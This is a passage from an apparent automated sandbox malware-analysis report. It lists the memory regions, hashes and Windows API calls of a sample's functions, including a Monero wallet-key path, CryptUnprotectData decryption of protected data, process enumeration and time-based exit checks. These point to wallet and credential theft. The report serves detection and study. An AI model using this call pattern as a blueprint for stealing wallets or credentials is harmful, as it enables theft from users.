                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: .$=2/$DH}$a<Zw$gYuG$ph7~$q_?
                        • API String ID: 0-2370584753
                        • Opcode ID: 12123123a85776d79a9f74ba8be88745d46a5ad68b50b1ca763c6b92a2c02703
                        • Instruction ID: 16de28dce564fb7c2d128a2136d4f237baaa82b96bafc941cca9a80e9b28d3e7
                        • Opcode Fuzzy Hash: 12123123a85776d79a9f74ba8be88745d46a5ad68b50b1ca763c6b92a2c02703
                        • Instruction Fuzzy Hash: 47B238F360C200AFE3086E2DEC9567ABBE5EF94720F16463DEAC4C7744EA3558058796
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: oy_$#yg_$5(?{$EI}$GIXD$GP_}$eV
                        • API String ID: 0-2648983576
                        • Opcode ID: e0230cd943f6d48727a60190027f2859c2184ffcee7c71da2bb639ea9d206652
                        • Instruction ID: 9163f4b63f04377e734f20bce37f3e592ba3bf1a0f3acbf10c934f6f6880c611
                        • Opcode Fuzzy Hash: e0230cd943f6d48727a60190027f2859c2184ffcee7c71da2bb639ea9d206652
                        • Instruction Fuzzy Hash: 9BB2D8F360C204AFE704AE2DEC8577AB7E9EF94720F16492DE6C4C7744EA3598018696
                        APIs
                          • Part of subcall function 005DA740: lstrcpy.KERNEL32(005E0E17,00000000), ref: 005DA788
                          • Part of subcall function 005DA920: lstrcpy.KERNEL32(00000000,?), ref: 005DA972
                          • Part of subcall function 005DA920: lstrcat.KERNEL32(00000000), ref: 005DA982
                          • Part of subcall function 005DA9B0: lstrlen.KERNEL32(?,014A8918,?,\Monero\wallet.keys,005E0E17), ref: 005DA9C5
                          • Part of subcall function 005DA9B0: lstrcpy.KERNEL32(00000000), ref: 005DAA04
                          • Part of subcall function 005DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005DAA12
                          • Part of subcall function 005DA8A0: lstrcpy.KERNEL32(?,005E0E17), ref: 005DA905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,005E0D73), ref: 005CE4A2
                        • StrCmpCA.SHLWAPI(?,005E14F8), ref: 005CE4F2
                        • StrCmpCA.SHLWAPI(?,005E14FC), ref: 005CE508
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 005CEBDF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                        • String ID: \*.*
                        • API String ID: 433455689-1173974218
                        • Opcode ID: 094fb4d3de3b41d3217a393696a2ffcffa81f1eb589d19cf8a9592e3c7dad4d3
                        • Instruction ID: 83957a699950ebf663f88d6397735f4f398bd2d77b428fc921b518fda0446eb4
                        • Opcode Fuzzy Hash: 094fb4d3de3b41d3217a393696a2ffcffa81f1eb589d19cf8a9592e3c7dad4d3
                        • Instruction Fuzzy Hash: 7D1233719101159ADB28FB74DC9AEEF7B38BF94300F40419BB50A56291EE306F89CF96
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: =J^n$P[k$Vbk{$jggn$o |$tUMg
                        • API String ID: 0-1730141673
                        • Opcode ID: 6469733ccab473227094a6e2981bd72c83f4787e17ad127c9777cabe37371e66
                        • Instruction ID: 242b40a6e51cf7df78612f356038984df2f714dbe7f5643c00f37e4430021b4b
                        • Opcode Fuzzy Hash: 6469733ccab473227094a6e2981bd72c83f4787e17ad127c9777cabe37371e66
                        • Instruction Fuzzy Hash: EBB217F360C2049FE7046E2DEC8567AFBE9EF94720F1A493DEAC5C3740EA7558018696
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 2v{_$NeyW$T=x$Z[1]$eR]$b2
                        • API String ID: 0-2572319919
                        • Opcode ID: 7fbcc70a74b797d104e1ffb04547d2650e37b29c6fd406c780335df0f4569ab5
                        • Instruction ID: e5bbcf1ad8d4322bbae21e99c5601d0ba964ceb84a46706ffcd8abff29bc0406
                        • Opcode Fuzzy Hash: 7fbcc70a74b797d104e1ffb04547d2650e37b29c6fd406c780335df0f4569ab5
                        • Instruction Fuzzy Hash: 84B217F390C2049FE704AE2DEC8567ABBE9EF94720F16453DEAC4C7344EA3598058796
                        APIs
                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N\,00000000,00000000), ref: 005C9AEF
                        • LocalAlloc.KERNEL32(00000040,?,?,?,005C4EEE,00000000,?), ref: 005C9B01
                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N\,00000000,00000000), ref: 005C9B2A
                        • LocalFree.KERNEL32(?,?,?,?,005C4EEE,00000000,?), ref: 005C9B3F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: BinaryCryptLocalString$AllocFree
                        • String ID: N\
                        • API String ID: 4291131564-3893816264
                        • Opcode ID: 0a191cba07ab55e7c1034c3f340b42ac9a9256abdda5225915e739b4f16b9964
                        • Instruction ID: 5d56217072e9df126ebe5b0b9c3d857b4668c72dd343ae0011878ac00f49fb88
                        • Opcode Fuzzy Hash: 0a191cba07ab55e7c1034c3f340b42ac9a9256abdda5225915e739b4f16b9964
                        • Instruction Fuzzy Hash: DA11A2B4240308BFEB14CFA4DC95FAA77B5FB89704F208058F9159B390C7B6A901CB90
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 0-Ev$]Z~$`+{$n)v$~/1=
                        • API String ID: 0-4148330775
                        • Opcode ID: a855b8925d7b461da36381b8bfa4c20796dc576db4bf834756655f7f99977079
                        • Instruction ID: b9336a4e0cb0bd5db022cc87120ff2e81b799872489fa337fc39edbe11fed404
                        • Opcode Fuzzy Hash: a855b8925d7b461da36381b8bfa4c20796dc576db4bf834756655f7f99977079
                        • Instruction Fuzzy Hash: 34B205F360C2049FE308AE2DEC5567AB7E5EBD4720F1A893DE6C5C7344EA3598018696
                        APIs
                        • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 005CC871
                        • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 005CC87C
                        • lstrcat.KERNEL32(?,005E0B46), ref: 005CC943
                        • lstrcat.KERNEL32(?,005E0B47), ref: 005CC957
                        • lstrcat.KERNEL32(?,005E0B4E), ref: 005CC978
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$BinaryCryptStringlstrlen
                        • String ID:
                        • API String ID: 189259977-0
                        • Opcode ID: 270cf8d9a0537189995e4a4ef67beea1d681354e01fdbd20de09217e7b5762ed
                        • Instruction ID: 98de9b140f99da0bb13f497af93db49621889aac8ec6d99385eeea497282963f
                        • Opcode Fuzzy Hash: 270cf8d9a0537189995e4a4ef67beea1d681354e01fdbd20de09217e7b5762ed
                        • Instruction Fuzzy Hash: 94418FB590420EDFDB54CF90DD89FFEBBB8BB48304F1045A8E509A6280D770AA84CF91
                        APIs
                        • GetSystemTime.KERNEL32(?), ref: 005D696C
                        • sscanf.NTDLL ref: 005D6999
                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 005D69B2
                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 005D69C0
                        • ExitProcess.KERNEL32 ref: 005D69DA
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Time$System$File$ExitProcesssscanf
                        • String ID:
                        • API String ID: 2533653975-0
                        • Opcode ID: 8d5c73d74c14d683a41c1127ae5e056dd7f952cc5817fcf499e557127c88b7f6
                        • Instruction ID: dd4cc50086ad1e9498caca4e4b96ed32f3570bc1148eb5e270c13ecd52d45171
                        • Opcode Fuzzy Hash: 8d5c73d74c14d683a41c1127ae5e056dd7f952cc5817fcf499e557127c88b7f6
                        • Instruction Fuzzy Hash: 6421DF75D14209ABCF58EFE8D945AEEB7B5FF48300F04852EE406E3250EB345605CB69
                        APIs
                        • GetProcessHeap.KERNEL32(00000008,00000400), ref: 005C724D
                        • RtlAllocateHeap.NTDLL(00000000), ref: 005C7254
                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 005C7281
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 005C72A4
                        • LocalFree.KERNEL32(?), ref: 005C72AE
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                        • String ID:
                        • API String ID: 2609814428-0
                        • Opcode ID: 0e3630f2008ab53a81bd14c7080c5607704bd61f159c8bc6bd543b9f91b317d2
                        • Instruction ID: f89f2fc331611890e4f5a3a131d20a020017b30ed56bd083c3540ca1ef120c12
                        • Opcode Fuzzy Hash: 0e3630f2008ab53a81bd14c7080c5607704bd61f159c8bc6bd543b9f91b317d2
                        • Instruction Fuzzy Hash: 0E010075A40308BFEB54DBD4CD45F9D7BB8BB44700F108558FB05AA2C0D6B0AA018B65
                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 005D961E
                        • Process32First.KERNEL32(005E0ACA,00000128), ref: 005D9632
                        • Process32Next.KERNEL32(005E0ACA,00000128), ref: 005D9647
                        • StrCmpCA.SHLWAPI(?,00000000), ref: 005D965C
                        • CloseHandle.KERNEL32(005E0ACA), ref: 005D967A
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                        • String ID:
                        • API String ID: 420147892-0
                        • Opcode ID: 06a118e4bddccfb289a5ca97c55672db70aae150a67d5354c414244b2938226c
                        • Instruction ID: 3f2278d56819756fe927c67b9da74e2d3033791547277e6c42ce9f4249eea4e5
                        • Opcode Fuzzy Hash: 06a118e4bddccfb289a5ca97c55672db70aae150a67d5354c414244b2938226c
                        • Instruction Fuzzy Hash: 9E010C75A00308ABDB64DFA5CD48BEDBBF8FB48700F10819AA905A6340D734DB40CF51
                        APIs
                        • CryptBinaryToStringA.CRYPT32(00000000,005C5184,40000001,00000000,00000000,?,005C5184), ref: 005D8EC0
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: BinaryCryptString
                        • String ID:
                        • API String ID: 80407269-0
                        • Opcode ID: be41911feca92c719a471f8cee984ba0b682996ff98bc664cefb5e45675bb836
                        • Instruction ID: 27a6a531f81f35474c4e75d64ddc4cd2db7051d96185d4d14184294124986492
                        • Opcode Fuzzy Hash: be41911feca92c719a471f8cee984ba0b682996ff98bc664cefb5e45675bb836
                        • Instruction Fuzzy Hash: 22110674200209BFDB54CF68D884FBA3BAABF89300F10995AF919CB350DB35E841DB60
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,014B0048,00000000,?,005E0E10,00000000,?,00000000,00000000), ref: 005D7A63
                        • RtlAllocateHeap.NTDLL(00000000), ref: 005D7A6A
                        • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,014B0048,00000000,?,005E0E10,00000000,?,00000000,00000000,?), ref: 005D7A7D
                        • wsprintfA.USER32 ref: 005D7AB7
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                        • String ID:
                        • API String ID: 3317088062-0
                        • Opcode ID: daa4cec5c0a63076861bf8ce352b758e29da89c0a0549f3283f1d94e15b96dc6
                        • Instruction ID: 15090cf1752efefa20e2906e3e981bed9440c4ff728ebdebf782ba32a5456ddd
                        • Opcode Fuzzy Hash: daa4cec5c0a63076861bf8ce352b758e29da89c0a0549f3283f1d94e15b96dc6
                        • Instruction Fuzzy Hash: B5115EB1A45218EBEB64CB58DC49FA9BB78FB04721F1047AAE91A932C0D7745A40CF51
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 1"o$ZnM$"s<
                        • API String ID: 0-1236542812
                        • Opcode ID: 6b622f83f2423f3232e4cb06f4d2f1bdd6bdba29c91ed6cea7dc89af3d4a7a0c
                        • Instruction ID: 259b1a9766389324051a68de4640c0330d0e479db93a308a5e8ad45dd80af74e
                        • Opcode Fuzzy Hash: 6b622f83f2423f3232e4cb06f4d2f1bdd6bdba29c91ed6cea7dc89af3d4a7a0c
                        • Instruction Fuzzy Hash: 13B229F3A0C210AFD3046E2DEC8567AF7E9EF94320F1A493DEAC5C3744EA7558058696
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: F8|$hQ$yO=
                        • API String ID: 0-4158459939
                        • Opcode ID: 58c5f7520bf012fcc5ad1ca391ab1c59468e7f8e5f729cbb183a965ee91c23a1
                        • Instruction ID: 0ebbca0b7d02a7d182d15fc63135f4e421ddd088eb422682a0743b9861ab2434
                        • Opcode Fuzzy Hash: 58c5f7520bf012fcc5ad1ca391ab1c59468e7f8e5f729cbb183a965ee91c23a1
